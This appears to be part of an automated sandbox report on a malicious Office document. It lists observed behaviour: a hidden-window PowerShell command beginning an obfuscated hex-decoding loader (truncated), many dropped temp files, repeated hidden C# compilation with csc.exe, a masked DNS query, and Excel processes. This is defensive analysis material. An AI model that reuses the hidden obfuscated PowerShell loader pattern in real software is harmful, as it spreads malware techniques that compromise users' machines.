Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function t94b1 {param($mca9daf)$k5a179='n143e1d';$g83e5fe='';for ($i=0; $i -lt $mca9daf.length;$i+=2){$hb7ecb=[convert]::ToByte($mca9daf.Substring($i,2),16);$g83e5fe+=[cha...
- %TEMP%\nue2rxgh.0.cs
- %TEMP%\m-whyu2o.cmdline
- %TEMP%\m-whyu2o.out
- %TEMP%\csc5e3f.tmp
- %TEMP%\res5e4f.tmp
- %TEMP%\m-whyu2o.dll
- %TEMP%\lh_322rd.0.cs
- %TEMP%\lh_322rd.cmdline
- %TEMP%\efl0oq_8.dll
- %TEMP%\m-whyu2o.0.cs
- %TEMP%\lh_322rd.out
- %TEMP%\lh_322rd.dll
- %TEMP%\3i_ptjdj.0.cs
- %TEMP%\3i_ptjdj.cmdline
- %TEMP%\3i_ptjdj.out
- %TEMP%\.ds_store
- %TEMP%\csc9358.tmp
- %TEMP%\res9369.tmp
- %TEMP%\csc7755.tmp
- %TEMP%\res7765.tmp
- %TEMP%\res4a2b.tmp
- %TEMP%\csc4a2a.tmp
- %TEMP%\efl0oq_8.out
- %TEMP%\nue2rxgh.out
- %TEMP%\cscd8e.tmp
- %TEMP%\resd9f.tmp
- %TEMP%\nue2rxgh.dll
- %TEMP%\k920autd.0.cs
- %TEMP%\k920autd.cmdline
- %TEMP%\k920autd.out
- %TEMP%\csc1aec.tmp
- %TEMP%\nue2rxgh.cmdline
- %TEMP%\res1aed.tmp
- %TEMP%\xt5cf0xg.0.cs
- %TEMP%\xt5cf0xg.cmdline
- %TEMP%\xt5cf0xg.out
- %TEMP%\csc3460.tmp
- %TEMP%\res3471.tmp
- %TEMP%\xt5cf0xg.dll
- %TEMP%\efl0oq_8.0.cs
- %TEMP%\efl0oq_8.cmdline
- %TEMP%\k920autd.dll
- %TEMP%\3i_ptjdj.dll
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{04271510-53c3-4b78-bd59-d4bae84209bd}.tmp
- %TEMP%\resd9f.tmp
- %TEMP%\res5e4f.tmp
- %TEMP%\csc5e3f.tmp
- %TEMP%\m-whyu2o.pdb
- %TEMP%\m-whyu2o.cmdline
- %TEMP%\m-whyu2o.0.cs
- %TEMP%\m-whyu2o.out
- %TEMP%\m-whyu2o.dll
- %TEMP%\res7765.tmp
- %TEMP%\csc7755.tmp
- %TEMP%\k920autd.pdb
- %TEMP%\lh_322rd.pdb
- %TEMP%\lh_322rd.out
- %TEMP%\lh_322rd.cmdline
- %TEMP%\lh_322rd.0.cs
- %TEMP%\res9369.tmp
- %TEMP%\csc9358.tmp
- %TEMP%\3i_ptjdj.cmdline
- %TEMP%\3i_ptjdj.0.cs
- %TEMP%\3i_ptjdj.pdb
- %TEMP%\3i_ptjdj.out
- %TEMP%\efl0oq_8.dll
- %TEMP%\efl0oq_8.out
- %TEMP%\efl0oq_8.cmdline
- %TEMP%\efl0oq_8.pdb
- %TEMP%\efl0oq_8.0.cs
- %TEMP%\nue2rxgh.dll
- %TEMP%\nue2rxgh.0.cs
- %TEMP%\nue2rxgh.cmdline
- %TEMP%\nue2rxgh.out
- %TEMP%\nue2rxgh.pdb
- %TEMP%\res1aed.tmp
- %TEMP%\csc1aec.tmp
- %TEMP%\k920autd.0.cs
- %TEMP%\k920autd.dll
- %TEMP%\3i_ptjdj.dll
- %TEMP%\lh_322rd.dll
- %TEMP%\k920autd.out
- %TEMP%\res3471.tmp
- %TEMP%\csc3460.tmp
- %TEMP%\xt5cf0xg.cmdline
- %TEMP%\xt5cf0xg.0.cs
- %TEMP%\xt5cf0xg.out
- %TEMP%\xt5cf0xg.pdb
- %TEMP%\xt5cf0xg.dll
- %TEMP%\res4a2b.tmp
- %TEMP%\csc4a2a.tmp
- %TEMP%\cscd8e.tmp
- %TEMP%\k920autd.cmdline
- %TEMP%\.ds_store
- DNS ASK sa###itgs.com
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nue2rxgh.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD9F.tmp" "%TEMP%\CSCD8E.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k920autd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1AED.tmp" "%TEMP%\CSC1AEC.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xt5cf0xg.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3471.tmp" "%TEMP%\CSC3460.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\efl0oq_8.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4A2B.tmp" "%TEMP%\CSC4A2A.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m-whyu2o.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5E4F.tmp" "%TEMP%\CSC5E3F.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lh_322rd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7765.tmp" "%TEMP%\CSC7755.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3i_ptjdj.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9369.tmp" "%TEMP%\CSC9358.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nue2rxgh.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD9F.tmp" "%TEMP%\CSCD8E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k920autd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1AED.tmp" "%TEMP%\CSC1AEC.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xt5cf0xg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3471.tmp" "%TEMP%\CSC3460.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\efl0oq_8.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4A2B.tmp" "%TEMP%\CSC4A2A.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m-whyu2o.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5E4F.tmp" "%TEMP%\CSC5E3F.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lh_322rd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7765.tmp" "%TEMP%\CSC7755.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3i_ptjdj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9369.tmp" "%TEMP%\CSC9358.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding